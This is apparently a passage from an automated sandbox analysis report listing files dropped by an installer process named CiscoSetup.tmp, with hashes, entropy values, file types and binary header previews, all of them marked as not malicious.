                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..r.F...I.t..X..*.&T..P.JT.*...d.)0..@.....I.T...~..L.9...".....s.7..{D..|..?w.D".H$..D"......$...h..{*...#..C..6dDt...0..]..6.v.<.,.....8E.k...$.h..j)..s...C.XE.r]5\..E|..].bDY.....Rl...\X..p]WMt.,..Q..O...Oe...........\..b...1.|BY.f.r.d.5.]..#e..h.u]5.y%...DtGD....q_Z.m.Vi.+*......5....{G.^~'..-.8..Xx...xK.-...[.a...2_wa...%....E..!...m1XKi.d...r...o.v.>.SIeq..)m....AH.....^.F.?.....w...?.s.G.......^r...G.(.viDh.X....O.>..+..5@....9....+..]W......m.emb!...../....W..WS?8d.E.<.Q...S...!.!#.R.u5........4..Qn.F*.G[.PYQY@...D........|..,.*.am....h..k..e"0'....IQJ..@N..7...&^.Y.S..........Q[o..../|j":.xnb._q...{^c'..Lz..!(.t..t..k.X...n..+................xLkzz....W..RVr.....Q.wy.T.........]... $n)d..#..........%..}.Hx..q..,T7..F..v....=7p..$(....].S.....D......=...m.B.......ML ..%...X...U.*...e..H..EM.?......].....D...o.).M...W.P.h......=..#..4...Z..0Yn.E..?...K ;K.$..n..Zq-A..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):472
                                                                                                                                                                                                  Entropy (8bit):7.339402871750466
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7IEzFffWxjBiqsoNKXcQjmUVQtaaHI:hI0RBiqJycQjmU6t9HI
                                                                                                                                                                                                  MD5:AE59E69F9BB8D40D28E2C195A5F131BD
                                                                                                                                                                                                  SHA1:1AC9ED0DD66CEFA5F515A8C0D51A3E26B7F2F6A9
                                                                                                                                                                                                  SHA-256:271F2C4002F0127CD049A9BEEED8474FACED3217E7BB0C6DDEB8B34F8536FA8E
                                                                                                                                                                                                  SHA-512:D69C0C2F7C190D1795A5C6455949C0B7F63D678785C170D8DB4A7D3FF88A048D954C8236E750D2F38CAD6CED9072DA7E8E3B5B384465074637D43390D9857C26
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH...Q.@...:..;......C.2)@,..:.*........(.9.........0....v.~.?.....j.....g.>n...z...u..NLU...;..2.s`.|.$...4],....Y............H.......G~.`$.p..^!]dS.UT.jE.%.......T...Y..O.....S...(.O.\.}..E{..2.p...s.._..,.D.wP.....DK.v...el..|..w.~.....{`))v.. .6^..y..rm:R}.L...+..<."..r...y#D9rD.Sd.Y..D_.o~......\.....$&;.1.6.<%..*.v.-.v3.^-M$ejU.4?%.K4..Y.R..Sm..'.AW..E....>".....^=.Y.......j.d.h.....IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.5904244181066343
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:qp/EF2cJeBcktRYgD9qsSyGrnPblkbGgmo:YccB8lPbGHB
                                                                                                                                                                                                  MD5:A1C46D32AA7BCD14A8DB10005E23B885
                                                                                                                                                                                                  SHA1:8859CD29B7D6A9D645C3B09D8AFAB041D3BB7A37
                                                                                                                                                                                                  SHA-256:66DAAB72327F0E98FC3006DA7B0F957901285993388BDE25D6149464A98C9442
                                                                                                                                                                                                  SHA-512:16CC5F81EC30BC027D6C3268383463968DD9E2C0A0A3BBDA8059BF8DC6A99853ED27CD1E1BD955ACF2F98B5B0693D5A2AEDCC69261F2E06B065ED11684179AD9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ..........................@...@...@...@...@...@...@...@...@...@...@...@...@...@.........................p...0.............................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................................p.....................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..M'..M'..M'..M'..nP:...w................`.............................@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..z]J.z]J.X5..M'..M'..M'..M'..z]J......................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.........................nP:.M'..M'..M'...................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................M'..M'..M'..M'...xh..........................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................cB+.M'..z]J.M'..M'...xh......................@...s...s...s...s...s...s
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.612237043911612
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:SPEyydQzC5enoYfFMdIDhjdmrEEN4kbGg2o:SFS5eno4FMyADNHx
                                                                                                                                                                                                  MD5:CAE552335F760EE1FF87D686F972BEB8
                                                                                                                                                                                                  SHA1:676A5070DDD6218C274FE01608754D06E735558A
                                                                                                                                                                                                  SHA-256:615057C1B8C472DDF3D6B48284DB764F3F4FE8A159FD479B96C401D0BEE82674
                                                                                                                                                                                                  SHA-512:876B7077A8DF9C900BCF1CF8D5AF98A3B84A7D31412DEE05CAF76ACA215B771EFD5CD5E8225175E822BCE24239A57F841D1DDF633B3C68599D0C401AA98BBDF9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ..............................................................@...@...@...@...@...@...@...@...@...@...@...@...@...@...........................................................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................................................................P.....@...s...s...s...s...s...s...s...s...s...s...s...s...@.........P.................................................................@...s...s...s...s...s...s...s...s...s...s...s...s...@......................................................................X5...@...s...s...s...s...s...s...s...s...s...s...s...s...@..X5...........................................................xh.M'..M'...@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..M'...xh..............................................xh.M'..M'.......@...s...s...s...s...s...s...s...s...s...s...s...s...@..z]J.M'..M'...xh................................P........M'..M'
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.4144936482461397
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:xLEWi6fEolR+vy+f7I8QbmvTn+3vCpK+hxZBBBpkbGgo2uo:xLV7EolbUISLn+3UBZBBBpkbGg6o
                                                                                                                                                                                                  MD5:68A2EA89135A31CE9E3E598F981433E0
                                                                                                                                                                                                  SHA1:1E2DABDFE730EAFD9A21F09C0E8E7F84E159E115
                                                                                                                                                                                                  SHA-256:73A199B9058AE8665DE3AD7792A7EE5DF7ADD2A4F2D8EFF49D81F221E8AFF85E
                                                                                                                                                                                                  SHA-512:CBCF48A63EA4CDC853950D2240B216EC8037E5CF0DFA9DA590C9F3749D5090406CA00CFCC5F844A7024ADD80B113F49F2F7D7F3D739F813360DA47720418DAC2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................P.........................@...@...@...@...@...@...@...@...@...@...@...@...@...@..................................... .....................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................................kY.X5..M'..M'..M'..M'..M'...@...s...s...s...s...s...s...s...s...s...s...s...s...@.........................0...........cB+.M'..M'..M'..X5..z]J.z]J.z]J.nP:..@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................0.........kY.M'..M'..X5....w..........................@...s...s...s...s...s...s...s...s...s...s...s...s...@.................0........nP:.M'..M'.......................................@...s...s...s...s...s...s...s...s...s...s...s...s...@......................nP:.M'..X5...........................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..................z]J.M'..X5
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11585
                                                                                                                                                                                                  Entropy (8bit):7.961332304899258
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uoknxnFWLkyZS1HwgrTfSTVQV1r+2HPOSm9HRNxe6S1ipOvyYh95kRwjtbul4Ljh:uo4xAoKoHuVuHPOSmdfxy1ipwN5bjtbB
                                                                                                                                                                                                  MD5:FAA694AA17D61EAC6803E15397AE2C15
                                                                                                                                                                                                  SHA1:D3FBA06AA2794D460DEF2997E84EC7CBE49A83AB
                                                                                                                                                                                                  SHA-256:9AC4F60BF1A10CD08529427AAA1C419F5C4C1412D23EE5764B9EDACC3558A980
                                                                                                                                                                                                  SHA-512:5B2586AC90E5366C236AE02181172842CFDC311495157477ACB388A50CA56B5FB1EE532B753323566937012A54027DC53DE803DB4178F6F85618ADA4B015308C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....UU..7bJ_..I&.:p..#.D.2...vOU...y......I.E0...LK ...T...E_.o.H^.......QG..Hy%v.=...;....wj..Ru.>g....}._R..U..s....^{.!.....F.!&..7~.ip....G.......n..$..-.PS..%..~.)..._i.%..A.....[.<.W.P..D.S.0]+...)U..A.>..F.V (Z.RS.s.i.tMy.'S\1;(.C..}...(Z.PS.s..+Pi.tY..B....;...H..h... R..w.]T\t.p."..N,.P.rDM..Q:..8...|K..........._.G..d.Dk.D...'+.E.P.2.L.7..\..1|..8~...&.0...L.a..1......s..'N.......;.O..L|}.4E.uam.1..Q(Z.c.P5&qt...........n...p~.*'O.&z........q~..A..b..,.P.2...\...QA...6.qM.'.(.)[.........z.X.B....C.l@."2..P.9*....$&...n.@..Bv....#b..W..n..9&..E.....!._Q}...R..b....G.g........w\..8.W....Wz.;.~~....2W.$.*....=..).U..TT Z..>.;....q.".hf.+.(Z.#C..B.%a...a.4Q?g*.T..l.;GD{...0..u.......r...!`.P.Y.t..A..H......h.LT...B........v)`.BH.W.P.b".X!/.p.b..;... .....hm..6.O...VD...\.......PB..............M..!...tU9.u_/..'L.....]'.A.2$.j .j..{....7..i.kaBG.6...e@M..IY..x..+V.....@..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2465
                                                                                                                                                                                                  Entropy (8bit):7.9078675566370515
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:OSjMqJt67atsaB2Q95MFMQQYs/7uI2/D8:OSd+7OsTQTuQYszIb8
                                                                                                                                                                                                  MD5:161092451DAE50221183377F7CFB560E
                                                                                                                                                                                                  SHA1:2884EE1CAD503614512FAF274C3E0AC209F9201B
                                                                                                                                                                                                  SHA-256:8CB267EF7B475567CF0A347A4E99CC533102789A966B7285A7733FD8E4FBDE47
                                                                                                                                                                                                  SHA-512:0BD327894C7A1AFC5AF1B3CD1D678370C568DF1A06A32408B4A4A3047A846657EDC09A1A0E094565EF4004DF6FEE3FBF0A2885FE0279F4920CB91FBE1D897B14
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~....SIDATx..\.l.U...d..v..P(t[..DDJ....-..."...5....1T.Q"i..?.....jK..ZS....) .*..6........s...e.3o...........s..{.*r... ..2.(.o}|..."...6l..]n....y..t".ID.D...l..ql;vt.y...u\g..:..+{......I5DT..5.t...!....8)K.:RS..!..-...S.0....e[..*8Y...E)A......H...y.yL%*.uU..S].>AV.'.\%QJ..&..)z...s.U|.!...i..5....e. .?.S*#.t....#..m...ol.D.7..CM..B.WM%|.L...E.)..P..6...A.V.d. .?....T3oF.=...JJL.qI....C.{..v..W.}.PS..........#........n%=.`.]}.._H...S..l.eL.5.9..;...x.....!).....T...q.....<.VU...n..J....i....g.{.m2$.61.9.....I..&7k.*.|.'m5s.).]...7....`n$.$C.....X!)....a......9..q...0......$..9.....A......!m...:.{.....T..LZ.....&|.H...A.0..8.O....?".,..N.V..._6R...X`.w...gx.5U....I..OIV.J...z.i.H..k...\..U.. >}..A`yi...Ct.y..8..#@Q8.'&.KK.D0y...2..i..$....Q...."j.....[Fg..0....,(9o.".8]S.#.9"ZSY.....Dtu_..ZO...G.9f.".(.$M.t+...e9&...L..NDk....$......|.l~..O`.....G...'.,`.D3...*.\.g.VEqQ."..C..,.*9..M.y..~."..A.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3638
                                                                                                                                                                                                  Entropy (8bit):7.889316799889741
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTH6gOjEda8+nWKHD:TSDS0tKg9E05THXOodrpKHD
                                                                                                                                                                                                  MD5:ADDC960D6A70987420055E0DEBCF4250
                                                                                                                                                                                                  SHA1:AF1D0C9386C1ADC774FC167F69B89637F414BED9
                                                                                                                                                                                                  SHA-256:B19F731C03166DB50BA5E0F0AD70A48E1223E7DD57B051A3DFB8CC23FBFAB482
                                                                                                                                                                                                  SHA-512:8F6D2CFA6BF8406CB2954029C0A43F3871C2C35E19CC0580925D4E847BFC6377749AB2A3FBF8CA030D55AEC3729AED6F54F7D7534A593A24927C8E274A811E1D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4370
                                                                                                                                                                                                  Entropy (8bit):7.900909498577029
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTcm/smdB4cT3NGDBWPryd:TSDS0tKg9E05Tcm/smAkMEPed
                                                                                                                                                                                                  MD5:CE71A3CEA2599D3A31ACAA9B55CA11E7
                                                                                                                                                                                                  SHA1:0592CF53E554F95BC722A21AF3CC9DF896BB6108
                                                                                                                                                                                                  SHA-256:0E0CF343355B77AA93DC0AFA9AFF96FF64EF5DFE73E9AAB57ECAA776BEC7EE7A
                                                                                                                                                                                                  SHA-512:D04AF6ED7247BCF61C969C1668A0F8F62CBA4A83E08CCFAE63755F56A4F6D49F9B1E39FABB10A3C04675828379658AE8FE414AC7682F7211C4A5F8949224E7EF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5558
                                                                                                                                                                                                  Entropy (8bit):4.450533821817726
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:vcn7ngbW2IU8R9Lq+LhfSnuX31xEqxpkg:E74IU8R9LqMTFxz
                                                                                                                                                                                                  MD5:EAF0F00DA8BB1D384B8A5BB3B82D0A54
                                                                                                                                                                                                  SHA1:2E7021D20D962F4568A51757B2D9B7408624740E
                                                                                                                                                                                                  SHA-256:86D5102E01D6D29D5AEE6E87E827B8C624D7B552035C9AFDB0BE2B120E4A553F
                                                                                                                                                                                                  SHA-512:57358DEA1B8A75A8FEEE29F9D83931D65672B228B93CE6C9CFEEBA3C77FD9FDB8D7B7D4A1F3188D8CBC2FEBF8B427F574791E6210580499788FF101641C01854
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .(...&......... .h...N...(... ...@..... ........................................................................ ...`...................................................................................................................p.........................................................~...~...}...}...}....0........................................`................z]J.M'..'....hm.)...................................................................................................z]J.M'..M'..M'..M'..'...%x}.+...............................................................................................M'..M'..M'...kY..............x}.....!....................................................................................xh.M'..M'..z]J.....................8y}.4...#................................................................................xh.M'..M'..............................Az~.=...%......................................................................p........M'..M'
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9736
                                                                                                                                                                                                  Entropy (8bit):7.95835565935799
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uGw9FbNic2CTLMZgb0OeuEqR0+zipNb19+MUs2b4uLbFv7MLlELHz5FijB:uZ95jOAdE+0+mpNB9dObfR4LiLHz5QjB
                                                                                                                                                                                                  MD5:64C1592AB32B98889AFDB7F216B3A535
                                                                                                                                                                                                  SHA1:9DA1BF63D0E9CCF65BA0C72E615099AD30DDB2EB
                                                                                                                                                                                                  SHA-256:B649B2B24F635758C6B424EBADA07097ABB56CE73E46F056268004D79575AA8F
                                                                                                                                                                                                  SHA-512:CA8376AEB64FE49CE253BEE7F949AEBFDB6C1EAD6270C739B09751CEEA313407F7AABBA7388E4ABFA53A48A322D827EF6D4FF1D458C3FB815239407646D53C84
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx......}....j'.b.*A...H.8B.p....IXM.Q....db..D...!.*#aI..J.h..M"k?...k..t.......+!j...T7.N.y9.r........o..e......{.....?...B..\i...... ........T...u ~.h...J.4..%"..k.^...O.....".....v...+7...........M....J.z....E..(...0M+.S.R"._.2.Y..h...J.+J.+.*.@..-5....T.......E+.4WZG)q.H...k.]..|C...*,.P.O9.72{.......]y.....}J.:Dd;C.|@..8J.....rEh.......c..|?......A.D}....J.[...<E.C)y.....J.A.. i...&8.3y...t.x.9bx .6......W..&......zV^9......e..VFPA..$..b...4q.L...&..R.....7.....aK..A...........6%V....=A.f.2$Ve.ue={.8....#.....7..V.P..FE9..#> ..OuDj...ME......*....+](Z).\i]...H#....>E....N**pb..>+;....X.....z6...E+aT..L.U.."5..YtS...l[....'..u..qsV.k..h%DM..(l...u.5.e.YN.H.'&.C......Qbu.....EA.....l......!.Um......Q....n.b.*.l{t.<.+l..B{.W.P.".E..V,..._.@....... X.Y6F......}i..j.rUY.@'v \k7<.&.b....V..+....-Vn..g..X.d\.ak..K...U.@...ZToS...........,8np.....l..G.P.|.r.MA.B)V..."....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2002
                                                                                                                                                                                                  Entropy (8bit):7.874049849617631
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:aYtizXuhGfrlz7ES0+AXMzboB3CiWBgvnUeHAG:nkVFNA8Pq39/UegG
                                                                                                                                                                                                  MD5:513D5EA87AFF39BFAC791F6A1AEA44B6
                                                                                                                                                                                                  SHA1:1858020A95D380478119D11C567D686B3097CEC7
                                                                                                                                                                                                  SHA-256:E04B608228DB3AB98917F8B62BB3F64FFBC6E272FFD2B84B2CEB752838FE4485
                                                                                                                                                                                                  SHA-512:2F26AECB0AE3B423B79B4EFDF7CFF8535236E62102F0F4DB9C98A88243B3B1A6EE5CB30F6D049FC3F5E19ABBF22C5DF19805ACB2F7FD3BEB77D7D33AA351E5D5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..{lSU...vK.nl%.6..... ...0.q#D.?d....C1!j..G.Q0.,A:b.q..5d...L%...H..I@.9..B.G..E.=.SN.n....n.&..]...........A1..Z\BD6"..G.?..AD.~....l?...G...Z.KD.DTAD%.{.V,a....(#=..{..a:........)/.H-Dt..l.f....l-.p(5.;.ge2 E.K.....ro?....9v.9.....r.m...8.-.....JW.....K............\..]OP..R...lz...J...|P..uP.-.*..J3 ...Ui.......OxcK..@...L.Bl..8....{M.b...m.b.1....^.(...UG.M..2[..x..k.[K;.=G.SR5.....Fh{...|..qo..8....PR._0[..&...SR....^..(M.d6.B .Lek...<j;}.r.s..k........q8M........z..5..MkV/..?]J......kw8.B.b..:...qW...U.g^..O.}.|/$@.s..0].r..twR..o.7.....4.J.Gs-6.....C.@..Ho8.s..0u...{..r3.Ri.S.U.B....Vm...Y...9.K}.`..7U..y..I.....j................+..d.p].'.>.O..U.....<....F..X.....9.M..5w....e>@wO[.<C).r.|.Z.....e.....t..>............E].N:xa...,)Y....T4.a.~.U..0.^U8.A..............|Y.....@O...)?)..9.v^...W.#.2-M.:M.@..O.......l....T..L.....,..P.''...E...ZUX@-..P.V&eX.......M*...<.c+.A....K...V.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):328808
                                                                                                                                                                                                  Entropy (8bit):6.41821402390606
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:VVLKYsv1i9CFGc8FZlkTPDB25C67bAOxAwArOU:VA1i9CFGcIZ6BsbkwAiU
                                                                                                                                                                                                  MD5:91F373CDC458934ADAB159BE8A7E5DCC
                                                                                                                                                                                                  SHA1:478AB55BCF5567BC3DAF208BD6F93814CC209C4A
                                                                                                                                                                                                  SHA-256:3E8F341ECFE24B6858A8E6EFD620CAE1F4D8C1F54B66FA20D7A8E9D97B5C1397
                                                                                                                                                                                                  SHA-512:1A1725C2AB15C9A16052F19F34BA9070ADE15A98F240220E74D5D21915EA296F2F14D7CA112A0AF9573E94D1A60DD79E38D1328888ECDB5DC0EA0690BD9E32D7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.:...i...i...i...h...i...h...i...h...iy`.h...iy`.h...iy`.h...i...h...i...h...i...i-..i{`.h...i{`.h...i{`ii...i...i...i{`.h...iRich...i........PE..L...n..d...........!.........0............................................................@A................................l...d.......................hH.......)..0...T...............................@............................................text...Z........................... ..`.rdata..............................@..@.data................x..............@....rsrc...............................@..@.reloc...).......*..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):328808
                                                                                                                                                                                                  Entropy (8bit):6.41821402390606
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:VVLKYsv1i9CFGc8FZlkTPDB25C67bAOxAwArOU:VA1i9CFGcIZ6BsbkwAiU
                                                                                                                                                                                                  MD5:91F373CDC458934ADAB159BE8A7E5DCC
                                                                                                                                                                                                  SHA1:478AB55BCF5567BC3DAF208BD6F93814CC209C4A
                                                                                                                                                                                                  SHA-256:3E8F341ECFE24B6858A8E6EFD620CAE1F4D8C1F54B66FA20D7A8E9D97B5C1397
                                                                                                                                                                                                  SHA-512:1A1725C2AB15C9A16052F19F34BA9070ADE15A98F240220E74D5D21915EA296F2F14D7CA112A0AF9573E94D1A60DD79E38D1328888ECDB5DC0EA0690BD9E32D7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.:...i...i...i...h...i...h...i...h...iy`.h...iy`.h...iy`.h...i...h...i...h...i...i-..i{`.h...i{`.h...i{`ii...i...i...i{`.h...iRich...i........PE..L...n..d...........!.........0............................................................@A................................l...d.......................hH.......)..0...T...............................@............................................text...Z........................... ..`.rdata..............................@..@.data................x..............@....rsrc...............................@..@.reloc...).......*..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3058280
                                                                                                                                                                                                  Entropy (8bit):6.02927936674107
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:I4MfZ031DVdQtj3IDJyfxR6oSmmr2E2y/dVevljoZj8OdoiM/dBVxfkT2vfsLt70:mR3IDJy5R6Smr9/jevlj67KBVxfkQ
                                                                                                                                                                                                  MD5:24DE4ED3FF1FA997F867B591BE4E001D
                                                                                                                                                                                                  SHA1:744D45EBD394880598B597D882AE2B634B9261FB
                                                                                                                                                                                                  SHA-256:7C4330C4BD0C6890C7EFC49AF493056B92332C65BE2BF885CD2A599369BA5349
